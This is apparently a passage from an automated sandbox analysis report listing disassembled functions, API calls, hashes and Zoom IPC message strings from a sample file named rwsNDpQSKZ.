                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: com.zoom.app.cci.ccivideo.settingssynctopt.request$device_id$device_name$is_enable$level$req_type
                • API String ID: 1769764177-966122582
                • Opcode ID: b8af46c9a8d84216382a9f3db49ebb1b793b401a8b49ffa4319eb09a33205c83
                • Instruction ID: 911f81ba76b68db26066569a1049a10bfc05d536be42aeecc12bfb7ed9c4a458
                • Opcode Fuzzy Hash: b8af46c9a8d84216382a9f3db49ebb1b793b401a8b49ffa4319eb09a33205c83
                • Instruction Fuzzy Hash: ADF06571B803517BD7107B55AC06B2E66A06760F15F51C16CB1546A2D1CBF88904DBB9
                Function 00C722B0 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 26windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C722B7
                • ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.settingssyncfrompt.request,00009E8D,req_type,device_name,device_id,is_enable,level,00000004), ref: 00C722E5
                  • Part of subcall function 00C7A420: __EH_prolog3.LIBCMT ref: 00C7A427
                  • Part of subcall function 00C7A420: ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C721CA,com.zoom.app.cci.ccivideo.settingssynctopt.request,00009E8C,req_type,device_name,device_id,is_enable,level,00000004), ref: 00C7A443
                  • Part of subcall function 00C92963: __EH_prolog3_GS.LIBCMT ref: 00C9296A
                  • Part of subcall function 00C92963: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C92984
                  • Part of subcall function 00C92963: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C929B2
                  • Part of subcall function 00C92963: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,?), ref: 00C929EF
                  • Part of subcall function 00C92963: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,-00000004,-00000004,?), ref: 00C92A1F
                  • Part of subcall function 00C92963: EnterCriticalSection.KERNEL32(?), ref: 00C92AB1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: com.zoom.app.cci.ccivideo.settingssyncfrompt.request$device_id$device_name$is_enable$level$req_type
                • API String ID: 1769764177-2160034841
                • Opcode ID: d1ab7139d2b5ee1f73e401bb71ed7b75eef99670c1fd6c53c3482d7258b3915a
                • Instruction ID: 4fa2874d1e630a9a3b62fab749e98101f6bcca244345968dd9ab8eb112b81cef
                • Opcode Fuzzy Hash: d1ab7139d2b5ee1f73e401bb71ed7b75eef99670c1fd6c53c3482d7258b3915a
                • Instruction Fuzzy Hash: DDF065B1B803507BC710BB54AC0BB2E26A06760F15F55C628F5446A2D1CBF88944D676
                Function 00C6C350 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C357
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IIIH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.Zoom.app.pt.mediaapi.request,00002749,requestID,req_type,timeout_seconds,mode,check_audio_device,00000004), ref: 00C6C384
                  • Part of subcall function 00C7C290: __EH_prolog3.LIBCMT ref: 00C7C297
                  • Part of subcall function 00C7C290: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@III@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6C389,com.Zoom.app.pt.mediaapi.request,00002749,requestID,req_type,timeout_seconds,mode,check_audio_device,00000004), ref: 00C7C2B3
                  • Part of subcall function 00C8C233: __EH_prolog3_GS.LIBCMT ref: 00C8C23A
                  • Part of subcall function 00C8C233: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C3B0), ref: 00C8C24E
                  • Part of subcall function 00C8C233: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.request,00000044,00C6C3B0), ref: 00C8C280
                  • Part of subcall function 00C8C233: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C2BD
                  • Part of subcall function 00C8C233: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.request,-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C2EF
                  • Part of subcall function 00C8C233: EnterCriticalSection.KERNEL32(?), ref: 00C8C381
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: check_audio_device$com.Zoom.app.pt.mediaapi.request$mode$req_type$requestID$timeout_seconds
                • API String ID: 3008810952-1181956020
                • Opcode ID: 54780035f9784bd3c373dc4fabdc517b384545fdbd1f63ee3c40ef860e3e3b48
                • Instruction ID: 28604725b4bdd3e1d70cea1a2e69fc3607459d96d32b681c0e827096505b65f0
                • Opcode Fuzzy Hash: 54780035f9784bd3c373dc4fabdc517b384545fdbd1f63ee3c40ef860e3e3b48
                • Instruction Fuzzy Hash: 0FE02B70A803C0BED71177949C4775D73609B20B1AF50812CB5006A2D2CBF4450CC6B9
                Function 00C764C0 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C764C7
                • ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@_K@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.cdnEventIndication,0000279A,evtType,msgTb,evtInfo,meetingID,meetingNum,00000004), ref: 00C764F4
                  • Part of subcall function 00C789A0: __EH_prolog3.LIBCMT ref: 00C789A7
                  • Part of subcall function 00C789A0: ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C764F9,com.zoom.app.cdnEventIndication,0000279A,evtType,msgTb,evtInfo,meetingID,meetingNum,00000004), ref: 00C789C3
                  • Part of subcall function 00C95AF0: __EH_prolog3_GS.LIBCMT ref: 00C95AF7
                  • Part of subcall function 00C95AF0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76520), ref: 00C95B0B
                  • Part of subcall function 00C95AF0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cdnEventIndication,00000044,00C76520), ref: 00C95B3D
                  • Part of subcall function 00C95AF0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.cdnEventIndication), ref: 00C95B7A
                  • Part of subcall function 00C95AF0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cdnEventIndication,-00000004,-00000004,com.zoom.app.cdnEventIndication), ref: 00C95BAC
                  • Part of subcall function 00C95AF0: EnterCriticalSection.KERNEL32(?), ref: 00C95C3E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@TreeV12@@V12@_
                • String ID: com.zoom.app.cdnEventIndication$evtInfo$evtType$meetingID$meetingNum$msgTb
                • API String ID: 952373449-4147567900
                • Opcode ID: f9c09f7f1b50b41cf732b39b69e316a14461a676061ec57f8b66404ccace40e2
                • Instruction ID: 8ec30675a39540026067eafa5907899b453017a7e1c975f7ae11e6e7936cbce4
                • Opcode Fuzzy Hash: f9c09f7f1b50b41cf732b39b69e316a14461a676061ec57f8b66404ccace40e2
                • Instruction Fuzzy Hash: 03E065F0BC4B447ED750BB98DC8B71D65A0A715F15F90856CB104B92C2CAF40548D779
                Function 00C6E6D0 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E6D7
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@HH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.load.service.request,00009DD0,roomName,roomUUID,d_microphone,rxChannelCounts,txChannelCounts,00000004), ref: 00C6E704
                  • Part of subcall function 00C7B8E0: __EH_prolog3.LIBCMT ref: 00C7B8E7
                  • Part of subcall function 00C7B8E0: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6E709,com.zoom.app.assistant.virtualaudio.message.load.service.request,00009DD0,roomName,roomUUID,d_microphone,rxChannelCounts,txChannelCounts,00000004), ref: 00C7B903
                  • Part of subcall function 00C8E763: __EH_prolog3_GS.LIBCMT ref: 00C8E76A
                  • Part of subcall function 00C8E763: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6E730), ref: 00C8E77E
                  • Part of subcall function 00C8E763: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request,00000044,00C6E730), ref: 00C8E7B0
                  • Part of subcall function 00C8E763: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E7ED
                  • Part of subcall function 00C8E763: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request,-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E81F
                  • Part of subcall function 00C8E763: EnterCriticalSection.KERNEL32(?), ref: 00C8E8B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.load.service.request$d_microphone$roomName$roomUUID$rxChannelCounts$txChannelCounts
                • API String ID: 1110529071-3337480333
                • Opcode ID: 7d5f6ebdd979eb4cbcb21328416ca0de6d60578731b5090453da7db1b2efb502
                • Instruction ID: 305cb1f274daa19aa890b042f7f29bdefab03cf4a95b15e536a19a1ba353dfa8
                • Opcode Fuzzy Hash: 7d5f6ebdd979eb4cbcb21328416ca0de6d60578731b5090453da7db1b2efb502
                • Instruction Fuzzy Hash: 24E09275AC1350BEC310BB649C07B1C32A06B50FEAF408A9DF2102A2D5CBF44D48D679
                Function 00C6A860 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A867
                • ??0?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyStartRecording,00002732,MeetingNo,MeetingTopic,Path,FilePrefix,RecordOption,00000004), ref: 00C6A894
                  • Part of subcall function 00C7D4B0: __EH_prolog3.LIBCMT ref: 00C7D4B7
                  • Part of subcall function 00C7D4B0: ??0?$CmmMessageTemplate_4@_JV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6A899,com.Zoom.app.conf.notifyStartRecording,00002732,MeetingNo,MeetingTopic,Path,FilePrefix,RecordOption,00000004), ref: 00C7D4D3
                  • Part of subcall function 00C89977: __EH_prolog3_GS.LIBCMT ref: 00C8997E
                  • Part of subcall function 00C89977: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6A8C0), ref: 00C89992
                  • Part of subcall function 00C89977: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyStartRecording,00000044,00C6A8C0), ref: 00C899C4
                  • Part of subcall function 00C89977: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.notifyStartRecording), ref: 00C89A01
                  • Part of subcall function 00C89977: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyStartRecording,-00000004,-00000004,com.Zoom.app.conf.notifyStartRecording), ref: 00C89A33
                  • Part of subcall function 00C89977: EnterCriticalSection.KERNEL32(?), ref: 00C89AC5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@_Template_5@_TreeV12@@
                • String ID: FilePrefix$MeetingNo$MeetingTopic$Path$RecordOption$com.Zoom.app.conf.notifyStartRecording
                • API String ID: 1602141080-363550428
                • Opcode ID: 6c7b17d4bb6e6d6f460b172fae686038b397a00b138cd7457af57035b67f8c9e
                • Instruction ID: 6f79811f202dd10ff5fd4edee209cad08493da394e3e8eff588ac97523d84263
                • Opcode Fuzzy Hash: 6c7b17d4bb6e6d6f460b172fae686038b397a00b138cd7457af57035b67f8c9e
                • Instruction Fuzzy Hash: D8E092B1680B90BED710BB58BC0FB2D66A0AF20F5AF40811CB5042E2D7CBF50908DB71
                Function 00C6CBF0 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CBF7
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HHV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.onRegistrar.notification,00009CA7,LineId,Status,RespCode,RespDescription,CodeDetail,00000004), ref: 00C6CC24
                  • Part of subcall function 00C7BE70: __EH_prolog3.LIBCMT ref: 00C7BE77
                  • Part of subcall function 00C7BE70: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6CC29,com.zoom.app.assistant.sip.onRegistrar.notification,00009CA7,LineId,Status,RespCode,RespDescription,CodeDetail,00000004), ref: 00C7BE93
                  • Part of subcall function 00C8CE80: __EH_prolog3_GS.LIBCMT ref: 00C8CE87
                  • Part of subcall function 00C8CE80: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6CC50), ref: 00C8CE9B
                  • Part of subcall function 00C8CE80: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.onRegistrar.notification,00000044,00C6CC50), ref: 00C8CECD
                  • Part of subcall function 00C8CE80: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CF0A
                  • Part of subcall function 00C8CE80: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.onRegistrar.notification,-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CF3C
                  • Part of subcall function 00C8CE80: EnterCriticalSection.KERNEL32(?), ref: 00C8CFCE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@TreeV12@
                • String ID: CodeDetail$LineId$RespCode$RespDescription$Status$com.zoom.app.assistant.sip.onRegistrar.notification
                • API String ID: 922116522-2011331210
                • Opcode ID: f4dac7734681b058862db25868593872ff9027f2bfde16ca0cab7191b65cd940
                • Instruction ID: 238db8edbc018f2f89db252e8b35801c4b13ef7b38364fa139825f21fed6d948
                • Opcode Fuzzy Hash: f4dac7734681b058862db25868593872ff9027f2bfde16ca0cab7191b65cd940
                • Instruction Fuzzy Hash: 93E092B1B80350BFE7107B69DC47B6D75A0EB00F1AF888128B5406A2D2CBF14508DFB6
                Function 00C68B10 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68B17
                • ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.Zoom.app.conf.plistChanged,00002720,MeetingID,cmd,userFBID,userDeviceID,screenName,00000004), ref: 00C68B44
                  • Part of subcall function 00C7F6A0: __EH_prolog3.LIBCMT ref: 00C7F6A7
                  • Part of subcall function 00C7F6A0: ??0?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C68B49,com.Zoom.app.conf.plistChanged,00002720,MeetingID,cmd,userFBID,userDeviceID,screenName,00000004), ref: 00C7F6C3
                  • Part of subcall function 00C86AF0: __EH_prolog3_GS.LIBCMT ref: 00C86AF7
                  • Part of subcall function 00C86AF0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68B70), ref: 00C86B0B
                  • Part of subcall function 00C86AF0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.plistChanged,00000044,00C68B70), ref: 00C86B3D
                  • Part of subcall function 00C86AF0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86B7A
                  • Part of subcall function 00C86AF0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.plistChanged,-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86BAC
                  • Part of subcall function 00C86AF0: EnterCriticalSection.KERNEL32(?), ref: 00C86C3E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@V12@@$CriticalEnterH00000@H0000@H_prolog3_Node@23@Root@SectionTemplate_4@Template_5@Tree
                • String ID: MeetingID$cmd$com.Zoom.app.conf.plistChanged$screenName$userDeviceID$userFBID
                • API String ID: 3406028513-698755778
                • Opcode ID: 002f48c3125c3e151599a15ff960fb9d70ece13ba8f33b5ddc9f534402825cee
                • Instruction ID: 8199a490784c59ee79c04e4e2266efb2fb784ad43e448058e8b0437b2ceca03b
                • Opcode Fuzzy Hash: 002f48c3125c3e151599a15ff960fb9d70ece13ba8f33b5ddc9f534402825cee
                • Instruction Fuzzy Hash: AFE092B0B80B50FEE714BF597C47B5D6690AB10F29F844669B1006A2E6CBF00508DFB6
                Function 00C68C90 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68C97
                • ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@IH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.Zoom.app.meeting.update.disclaimer.status,0000275C,MyScreenName,MeetingNumber,MeetingID,Type,Agree,00000004), ref: 00C68CC4
